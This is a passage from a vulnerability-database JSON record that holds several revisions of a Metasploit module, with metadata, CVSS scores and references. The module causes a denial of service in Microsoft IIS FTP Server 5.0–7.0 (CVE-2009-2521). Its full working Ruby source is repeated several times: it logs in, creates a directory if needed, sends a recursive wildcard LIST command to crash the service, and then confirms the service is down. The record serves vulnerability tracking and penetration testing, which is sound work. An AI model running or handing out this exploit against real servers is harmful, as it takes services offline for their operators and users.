https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2019-04-19T10:51:35", "differentElements": ["modified", "published"], "edition": 58}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "06553b862fc3034191c52a9cc2c2982b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-04-19T12:43:20", "history": [], "viewCount": 103, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}], "modified": "2019-04-19T12:43:20"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2019-04-19T12:43:20", "differentElements": ["sourceData"], "edition": 59}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "7bd7400596b30d53c7d0d8a4f1d8d465", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-04-27T12:53:50", "history": [], "viewCount": 103, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-04-27T12:53:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2019-04-27T12:53:50", "differentElements": ["sourceData"], "edition": 60}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "06553b862fc3034191c52a9cc2c2982b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-04-27T14:35:46", "history": [], "viewCount": 112, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-04-27T14:35:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2019-04-27T14:35:46", "differentElements": ["description", "metasploitHistory", "metasploitReliability", "modified", "references", "sourceData", "sourceHref"], "edition": 61}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "b8037d178afc8c7b84f8952bead22865", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-05-28T20:51:25", "history": [], "viewCount": 112, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-05-28T20:51:25"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-28T20:51:25", "differentElements": ["cvss"], "edition": 62}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-05-29T20:52:07", "history": [], "viewCount": 112, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-05-28T20:51:25"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-29T20:52:07", "differentElements": ["sourceData"], "edition": 63}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "63880e80d9ab8ef7c9ba96cc0415c260", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-06-01T14:37:23", "history": [], "viewCount": 112, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-05-28T20:51:25"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-01T14:37:23", "differentElements": ["sourceData"], "edition": 64}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-06-01T21:52:09", "history": [], "viewCount": 116, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-06-01T21:52:09"}, "dependencies": {"references": [{"type": "cve", "idList": 